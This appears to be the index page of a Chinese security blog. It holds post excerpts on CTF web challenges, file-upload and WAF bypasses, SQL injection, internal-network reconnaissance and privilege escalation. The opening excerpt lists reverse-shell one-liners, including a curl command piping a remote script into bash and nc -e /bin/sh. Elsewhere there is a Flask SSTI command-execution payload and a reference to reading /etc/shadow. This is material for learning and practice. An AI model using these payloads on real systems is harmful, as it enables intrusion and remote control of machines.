qq_40327508的博客

原创 shell反弹记录

bash -i >& /dev/tcp/ip/port 0>&1bash -i >& /dev/tcp/192.168.20.151/7777 0>&1curl http://174.1.73.154/shell.txt|bashnc -e /bin/sh ip portpython -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STRE

原创 文件上传奇淫技巧

可用于绕过安全狗4.0大致思路呢，就是考虑到安全狗在检测的时候，是正则常规request包，但是apache处理request包的时候有容错，这就造成了差异性，安全狗就会提取不出应该提取的部分，从而绕过文件名回车绕过：==绕过双写filename=;（诡异的request包）%00截断在文件名后面加上%00然后CTRL+SHIFT+U转成字符，这里后面不用加.jpg也可以...

原创 文件上传总结

客户端javascript校验禁用js，抓包等服务端校验文件头content-type字段校验image/gif文件内容头校验.JPEG;.JPE;.JPG，”JPGGraphic File”.gif，”GIF 89A”.zip，”Zip Compressed”.doc;.xls;.xlt;.ppt;.apr，”MS Compound Document v1 or Lotus Approach APRfile”文件名检测后缀名白名单校验配合文件解析漏洞配合文件包含漏洞长文件名

原创 sql注入绕过总结

原创 [NPUCTF2020]ezinclude

进入页面发现需要传入name和pass，源代码发现hint疑似MD5哈希长度拓展攻击,在响应包里面给出啦pass的值得到了 flflflflag.php ，访问重定向到了其他页面，抓包抓回来，页面提示 include($_GET[“file”]) ，扫目录可以得到 dir.php ,包含他可以看到这个页面列出了 /tmp 下的所有文件这里考察的是PHP临时文件包含，其基本是两种情况：利用能访问的phpinfo页面，对其一次发送大量数据造成临时文件没有及时被删除PHP版本<7.2，利用ph

原创 内网信息收集

本机信息收集1.查询账户信息：对当前主机的用户角色和用户权限做了解，判断是否需要进一步提升权限。 win：whoami、net user 用户名 linux：whoami、id、cat /etc/shadow、cat /etc/passwd2.查询网络和端口信息根据目的主机的IP地址/网络连接/相关网络地址，确认所连接的网络情况。win：ipconfig、netstat -ano ARP表：arp -a 路由表: route print

原创 [CISCN2019 华东南赛区]Double Secret

页面比较简陋扫目录扫出一个secret目录在url加上secret参数，发现被加密随意输入一些他报错了~。我们发现了关键处的代码这里的加密算法使用的是RC4，密钥泄漏了。将所发送内容解密之后会被渲染，因此考虑到可能存在模版注入。在网上找了一个RC4加密脚本,再次基础上输入密钥并尝试文件读取。import base64from urllib.parse import quotedef rc4_main(key = "init_key", message = "init_message"):

原创 [b01lers2020]Welcome to Earth

一直自动跳转/die/页面，抓包尝试查看chase目录后面就一路找，但是没找到什么有用的信息看了wp才知道，关键点在js文件中/static/js/door.js最后来到static/js/fight.js重新排序flag即可from itertools import permutationsflag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]item = permutations(flag)f

原创 [CSCCTF 2019 Qual]FlaskLight

考点：ssti注入 flask模板根据题目等提示是flask模板，测试一下获取所有的类可以看到很多类，寻找那些可以包含文件或者命令执行的类例如 file、popen等例一：warnings.catch_warnings类{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

原创 [BJDCTF 2nd]文件探测

查看包头访问home.php,查看urlhttp://4ab7acda-aefd-434e-9e66-647331d51676.node3.buuoj.cn/home.php?file=system可能存在文件包含漏洞，使用php伪协议尝试获取源代码源码：<?phpsetcookie("y1ng", sha1(md5('y1ng')), time() + 3600);setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']),

原创 [GKCTF2020]EZ三剑客-EzWeb

考点ssrf redis反弹shell打开网站，查看源代码查看文件访问下ip经过测试是ssrf漏洞使用burp爆破内网ip

原创 [GXYCTF2019]BabysqliV3.0 [phar]

打开题目是登录界面，使用burp爆破出密码是password登录上传文件，以及url里有拼接file参数，可能有文件包含漏洞使用php伪协议获取upload源码<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype="multipart/form-data"> 上传文件 <input type="fil

原创 ctfshow 红包题第九弹 ssrf

通过抓包登陆界面，发现存在ssrf漏洞在通过ps猜测是ssrf打mysql使用gopherus工具生成ssrf打mysql 的payload之后放到burp中把参数在url编码一次查看是否成功写入文件成功写入，使用蚁剑连接

原创 ctfshow Login_Only_For_36D

在源代码中可以看到sql语句因为过滤了’ 等使用regexp注入脚本import requestsimport time as turl ="http://92c75efe-44ec-4055-8ca8-89aaf5eee173.chall.ctf.show/"k = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"flag = ""data = { 'username':'admin\\',

原创 [GYCTF2020] Ezsqli

考点：盲注 + 无列名注入使用异或注入发现页面回显不一样进一步判断接下来开始获取列名，但是因为or被过滤使用sys.x$schema_flattened_keys绕过使用脚本获取表名import requestsurl = "http://9c35ab79-5056-4de1-87fe-0418ebc00b82.node3.buuoj.cn/index.php"flag = ""payload = "1^(ascii(substr((select group_concat(tab

原创 docker学习笔记

docker学习搜索镜像： docker search 要搜索的镜像 例子： docker search redis拉取镜像： doucker pull 要下载的镜像:标签（如果不写，默认为latest） 例子： docker pull ubuntu查看当前镜像列表： docker images # 查看当前镜像列表 运行容器： 例子： docker run -it ubuntu /bin/bash 参数： -i: 交互式操作。 -t: 终端

原创 正则绕过总结

换行符绕过(%0a)<?phpinclude("flag.php");highlight_file(__FILE__);$c = $_GET['c'];if (preg_match('/^flag$/i', $c) && $c !== 'flag') { echo $flag;}else{ echo "nonono";}2.数组绕过preg_match只能处理字符串，当传入的subject是数组时会返回false3.%5c绕过<?ph.

原创 Windows提权——收集

提权辅助网站：1.https://bugs.hacking8.com/tiquan/将补丁号或systeminfo信息复制到文本栏即可2.https://github.com/Al1ex/Heptagram/tree/master/Windows/Elevationwindwos提权类脚本

原创 windows提权（一）

内核漏洞提权#查看本地系统补丁systeminfo |findstr "KB"wmic qfe get Caption,Description,HotFixID,InstalledOn#另外两种远程查询的方式需要结合其他远程执行方式，例如 wmic远程，schtasks远程、dcom远程等等，还有一些笔者不知到远程执行方式。wmic qfe get Caption,Description,HotFixID,InstalledOn |findstr /C:"KB3143141"得到补丁号可以使用

原创 Linix提权（一）

SUID 提权什么是suid？suid全称是Set owner User ID up on execution。这是Linux给可执行文件的一个属性。通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。需要注意的是，只有程序的所有者是0号或其他super user，同时拥有suid权限，才可以提权。常见的可用来提权的Linux 可执行文件有：Nmap, Vim, find, bash, more, less, nano, cp查看可以suid 提权的可执行文件find / -pe

原创 [HFCTF2020]BabyUpload

[HFCTF2020]BabyUpload题目直接给了源代码<?phperror_reporting(0);session_save_path("/var/babyctf/");session_start();require_once "/flag";highlight_file(__FILE__);if($_SESSION['username'] ==='admin'){ $filename='/var/babyctf/success.txt'; if(file_e

原创 [安洵杯 2019]easy_web

[安洵杯 2019]easy_web考点：MD5强类型绕过，命令注入绕过进入发现img参数可能有任意文件下载通过2次base64解密和一次hex转字符串得到555.png再通过相同的方式获取到了index.php的源码<?phperror_reporting(E_ALL || ~ E_NOTICE);header('content-type:text/html;charset=utf-8');$cmd = $_GET['cmd'];if (!isset($_GET['img'])

转载 buuctf web [BJDCTF2020]EzPHP

进入后是这样的查看源代码发现注释base32解码得到1nD3x.php，发现是源码 <?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';e...

原创 buuctf web [CISCN2019 华东南赛区]Web11

buuctf web [CISCN2019 华东南赛区]Web11进入后页面是这样的可以通过最低端发现是Smarty SSTI，又从右上角得知是通过ip注入使用burp构造X-Forwarded-For开始注入从返回14看出确实存在注入，接下来根据smarty手册返回版本号等最后读取flag...